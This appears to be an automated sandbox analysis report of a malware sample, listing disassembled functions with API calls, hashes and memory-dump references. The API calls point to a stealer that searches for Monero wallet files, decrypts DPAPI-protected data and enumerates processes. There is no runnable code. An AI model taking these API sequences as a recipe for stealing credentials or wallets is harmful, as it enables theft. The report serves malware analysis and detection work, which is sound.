                              • Instruction ID: 557b6833cf91a44bf4697d58d7ce50ab08a3b668ba4868e266a56da17d26016e
                              • Opcode Fuzzy Hash: 467a2d7601c297bac065eeabae779a17aa0605477d39ee30e75ac3339d3e4c17
                              • Instruction Fuzzy Hash: 44413B71940218ABCB24DB95DCD9BEEB374FF48700F204699E10972180DB342F85CFA1
                              Function 01022EB2 Relevance: 10.4, Strings: 7, Instructions: 1640COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1798849780.0000000000EAE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                              • Associated: 00000000.00000002.1798710835.0000000000C50000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001040000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.000000000112B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001152000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.000000000115B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001169000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799112151.000000000116A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799226557.0000000001315000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799238668.0000000001316000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_c50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: $<>$<$x{$Jgw$SZgz$[/O$z[h$j?
                              • API String ID: 0-3427209661
                              • Opcode ID: dd1ba9af9e747b15c96ba60d9be8037a436cfb32c8b3b4337730f30c4b97bcdb
                              • Instruction ID: 2fc5a24c355abfb51eb8e8e75b2ae4979a608b09a677f51ddd43efe1ddee0380
                              • Opcode Fuzzy Hash: dd1ba9af9e747b15c96ba60d9be8037a436cfb32c8b3b4337730f30c4b97bcdb
                              • Instruction Fuzzy Hash: 45B217F360C6049FE3046E2DEC8567AFBE9EF94720F1A493DE6C4C3744EA3599018696
                              Function 00C5E430 Relevance: 9.3, APIs: 4, Strings: 1, Instructions: 514fileCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00C6A740: lstrcpy.KERNEL32(00C70E17,00000000), ref: 00C6A788
                                • Part of subcall function 00C6A920: lstrcpy.KERNEL32(00000000,?), ref: 00C6A972
                                • Part of subcall function 00C6A920: lstrcat.KERNEL32(00000000), ref: 00C6A982
                                • Part of subcall function 00C6A9B0: lstrlen.KERNEL32(?,007F90E8,?,\Monero\wallet.keys,00C70E17), ref: 00C6A9C5
                                • Part of subcall function 00C6A9B0: lstrcpy.KERNEL32(00000000), ref: 00C6AA04
                                • Part of subcall function 00C6A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00C6AA12
                                • Part of subcall function 00C6A8A0: lstrcpy.KERNEL32(?,00C70E17), ref: 00C6A905
                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,00C70D73), ref: 00C5E4A2
                              • StrCmpCA.SHLWAPI(?,00C714F8), ref: 00C5E4F2
                              • StrCmpCA.SHLWAPI(?,00C714FC), ref: 00C5E508
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 00C5EBDF
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1798722165.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                              • Associated: 00000000.00000002.1798710835.0000000000C50000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000000EAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001040000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.000000000112B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001152000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.000000000115B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001169000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799112151.000000000116A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799226557.0000000001315000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799238668.0000000001316000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_c50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                              • String ID: \*.*
                              • API String ID: 433455689-1173974218
                              • Opcode ID: bc3e4b04a5e847d17794a9cc4762d24f486e7ec8732f11245eb6481dfc583813
                              • Instruction ID: a17ae2e45532c2bafdd6fec5f4eb6548bcefcaa874e89e2ecb8d730d37ebf56d
                              • Opcode Fuzzy Hash: bc3e4b04a5e847d17794a9cc4762d24f486e7ec8732f11245eb6481dfc583813
                              • Instruction Fuzzy Hash: 4B121E719101189ADB28FB71DDD6EEE7338AF58300F5045A9B50AB7091EE306F89DF92
                              Function 0101C189 Relevance: 9.2, Strings: 6, Instructions: 1656COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1798849780.0000000000EAE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                              • Associated: 00000000.00000002.1798710835.0000000000C50000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001040000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.000000000112B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001152000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.000000000115B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001169000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799112151.000000000116A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799226557.0000000001315000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799238668.0000000001316000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_c50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: <*y$L\{v$e4}$god?$jMs>$w"|u
                              • API String ID: 0-2148103553
                              • Opcode ID: 36f246df4ca1a78e8f60f110ffe327acc56e67a597f5c5250804f96f522b27cb
                              • Instruction ID: e800b4ba8587b7ea507ef29169d0b30a83187645137471c28719fcb139673758
                              • Opcode Fuzzy Hash: 36f246df4ca1a78e8f60f110ffe327acc56e67a597f5c5250804f96f522b27cb
                              • Instruction Fuzzy Hash: 49B207F360C304AFE3046E6DEC8567ABBE9EFD4720F1A893DE6C487744E93558058692
                              Function 0102807C Relevance: 7.9, Strings: 5, Instructions: 1637COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1798849780.0000000000EAE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                              • Associated: 00000000.00000002.1798710835.0000000000C50000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001040000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.000000000112B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001152000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.000000000115B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001169000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799112151.000000000116A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799226557.0000000001315000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799238668.0000000001316000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_c50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: &p[;$B+`)$`h}$j(_-$zf|_
                              • API String ID: 0-3895703705
                              • Opcode ID: ad416b532d3cc3fadddbb67de6dbc8ac009ea5fa7f729760d5a6465947680442
                              • Instruction ID: 42f0cd6aeed72acfb7cf1e37ecb4ea1f0104d3899d49780897630b04cc2cb6c7
                              • Opcode Fuzzy Hash: ad416b532d3cc3fadddbb67de6dbc8ac009ea5fa7f729760d5a6465947680442
                              • Instruction Fuzzy Hash: F1B228F36082049FE304AE2DEC8567ABBD9EF94720F1A853DE6C4C7744EA3598058797
                              Function 0101DCCA Relevance: 7.8, Strings: 5, Instructions: 1585COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1798849780.0000000000EAE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                              • Associated: 00000000.00000002.1798710835.0000000000C50000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001040000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.000000000112B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001152000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.000000000115B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001169000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799112151.000000000116A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799226557.0000000001315000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799238668.0000000001316000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_c50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: &)x4$=}X$@?g?$M6_$TM[
                              • API String ID: 0-3267072730
                              • Opcode ID: e80e22e325d26efd5b0c31b6a0693e150777e1c04e4a5b335e9d8cd8f215f51d
                              • Instruction ID: 3a21ee444cb10f2ab606999f622d51ceba7f4687fdcfb4e4905dc906231d12f3
                              • Opcode Fuzzy Hash: e80e22e325d26efd5b0c31b6a0693e150777e1c04e4a5b335e9d8cd8f215f51d
                              • Instruction Fuzzy Hash: 5AB2E5F3A0C2009FE304AE29EC8567AF7E9EF94720F1A893DE6C4C7744E63558458697
                              Function 00C5C820 Relevance: 7.6, APIs: 5, Instructions: 95stringencryptionCOMMON
                              Download Yara Rule
                              APIs
                              • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 00C5C871
                              • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 00C5C87C
                              • lstrcat.KERNEL32(?,00C70B46), ref: 00C5C943
                              • lstrcat.KERNEL32(?,00C70B47), ref: 00C5C957
                              • lstrcat.KERNEL32(?,00C70B4E), ref: 00C5C978
                              Memory Dump Source
                              • Source File: 00000000.00000002.1798722165.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                              • Associated: 00000000.00000002.1798710835.0000000000C50000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000000EAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001040000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.000000000112B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001152000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.000000000115B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001169000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799112151.000000000116A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799226557.0000000001315000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799238668.0000000001316000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_c50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$BinaryCryptStringlstrlen
                              • String ID:
                              • API String ID: 189259977-0
                              • Opcode ID: 1bb01de23dd8476cce0ee91c68deffa2d9095cbf7dee27c875b0f5aadfc0f73c
                              • Instruction ID: e061d87dff41326298f8fb6e8db8d9e444534b6bc0ae60c628c6f05525731cb6
                              • Opcode Fuzzy Hash: 1bb01de23dd8476cce0ee91c68deffa2d9095cbf7dee27c875b0f5aadfc0f73c
                              • Instruction Fuzzy Hash: 74415BB890421ADFDB10CF90DC89BFEB7B8AF48304F1441A9E509A6280D7745B88CF92
                              Function 00C57240 Relevance: 7.5, APIs: 5, Instructions: 48memoryencryptionCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000008,00000400), ref: 00C5724D
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00C57254
                              • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00C57281
                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 00C572A4
                              • LocalFree.KERNEL32(?), ref: 00C572AE
                              Memory Dump Source
                              • Source File: 00000000.00000002.1798722165.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                              • Associated: 00000000.00000002.1798710835.0000000000C50000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000000EAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001040000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.000000000112B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001152000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.000000000115B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001169000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799112151.000000000116A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799226557.0000000001315000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799238668.0000000001316000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_c50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                              • String ID:
                              • API String ID: 2609814428-0
                              • Opcode ID: 19ea4b653f15ec83b7d4172b27672f64f6aebb08079d67bac24e8cf6f9a35c81
                              • Instruction ID: c10096b35f21cb512f23474e8411959e40957375af550fd3489ab2e024ad0d7f
                              • Opcode Fuzzy Hash: 19ea4b653f15ec83b7d4172b27672f64f6aebb08079d67bac24e8cf6f9a35c81
                              • Instruction Fuzzy Hash: 970140B5A40208BFDB24DBD4DD4AF9E7778AB44701F104156FB05BA2C0C670AA048BA5
                              Function 00C69600 Relevance: 7.5, APIs: 5, Instructions: 42processCOMMON
                              Download Yara Rule
                              APIs
                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00C6961E
                              • Process32First.KERNEL32(00C70ACA,00000128), ref: 00C69632
                              • Process32Next.KERNEL32(00C70ACA,00000128), ref: 00C69647
                              • StrCmpCA.SHLWAPI(?,00000000), ref: 00C6965C
                              • CloseHandle.KERNEL32(00C70ACA), ref: 00C6967A
                              Memory Dump Source
                              • Source File: 00000000.00000002.1798722165.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                              • Associated: 00000000.00000002.1798710835.0000000000C50000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000000EAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001040000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.000000000112B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001152000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.000000000115B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001169000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799112151.000000000116A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799226557.0000000001315000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799238668.0000000001316000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_c50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                              • String ID:
                              • API String ID: 420147892-0
                              • Opcode ID: 61dafa41febdaae96ae31f0ad17d1482069020493d2b527afc1520dac35088fc
                              • Instruction ID: 7cdd5dfdb8ae44b9af3a756f8df24e002e3910d53ffd0aa3337e74fffa6f0267
                              • Opcode Fuzzy Hash: 61dafa41febdaae96ae31f0ad17d1482069020493d2b527afc1520dac35088fc
                              • Instruction Fuzzy Hash: 7B01E9B5A00208AFCB64DFA6C988BEDB7F9EF48300F14419AA906A6240D7749B44CF91
                              Function 01029BB4 Relevance: 6.6, Strings: 4, Instructions: 1583COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1798849780.0000000000EAE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                              • Associated: 00000000.00000002.1798710835.0000000000C50000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001040000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.000000000112B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001152000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.000000000115B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001169000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799112151.000000000116A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799226557.0000000001315000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799238668.0000000001316000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_c50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: <b}{$HN-}$d2>$xL9O
                              • API String ID: 0-2644612385
                              • Opcode ID: 315db04da4d92e53e940e24b34b9594e099f3f7ebd29e0968b9262eb09bb8cfb
                              • Instruction ID: ec36a1649df44f9e0297beb4563fa8f2a7cb6980e72557433729c4b4ded457a5
                              • Opcode Fuzzy Hash: 315db04da4d92e53e940e24b34b9594e099f3f7ebd29e0968b9262eb09bb8cfb
                              • Instruction Fuzzy Hash: 46B2F7F3A08204AFE3046E2DDC8567AFBE9EF94720F1A493DE6C4C3744EA3558118697
                              Function 01032729 Relevance: 6.3, Strings: 4, Instructions: 1334COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1798849780.0000000000EAE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                              • Associated: 00000000.00000002.1798710835.0000000000C50000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001040000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.000000000112B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001152000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.000000000115B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001169000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799112151.000000000116A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799226557.0000000001315000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799238668.0000000001316000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_c50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: 03YE$2bmv$8P_$vupo
                              • API String ID: 0-1257031978
                              • Opcode ID: 02944471f350f5c9be0929af88f7c8f4ce0f294ce23857ab364c6d1d1d6e9368
                              • Instruction ID: 22702bb4a155ce763f7d57113e77ac25e02b9ee297ca83ad4964820731ba5ee8
                              • Opcode Fuzzy Hash: 02944471f350f5c9be0929af88f7c8f4ce0f294ce23857ab364c6d1d1d6e9368
                              • Instruction Fuzzy Hash: D39227F360C2049FE304AE2DEC8577ABBE9EB94720F16853DEAC4C3744EA3558158697
                              Function 00C68680 Relevance: 6.1, APIs: 4, Instructions: 77processCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00C6A740: lstrcpy.KERNEL32(00C70E17,00000000), ref: 00C6A788
                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00C705B7), ref: 00C686CA
                              • Process32First.KERNEL32(?,00000128), ref: 00C686DE
                              • Process32Next.KERNEL32(?,00000128), ref: 00C686F3
                                • Part of subcall function 00C6A9B0: lstrlen.KERNEL32(?,007F90E8,?,\Monero\wallet.keys,00C70E17), ref: 00C6A9C5
                                • Part of subcall function 00C6A9B0: lstrcpy.KERNEL32(00000000), ref: 00C6AA04
                                • Part of subcall function 00C6A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00C6AA12
                                • Part of subcall function 00C6A8A0: lstrcpy.KERNEL32(?,00C70E17), ref: 00C6A905
                              • CloseHandle.KERNEL32(?), ref: 00C68761
                              Memory Dump Source
                              • Source File: 00000000.00000002.1798722165.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                              • Associated: 00000000.00000002.1798710835.0000000000C50000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000000EAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001040000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.000000000112B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001152000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.000000000115B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001169000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799112151.000000000116A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799226557.0000000001315000.00000040.00000001.01000000.00000003.sdmpDownload File
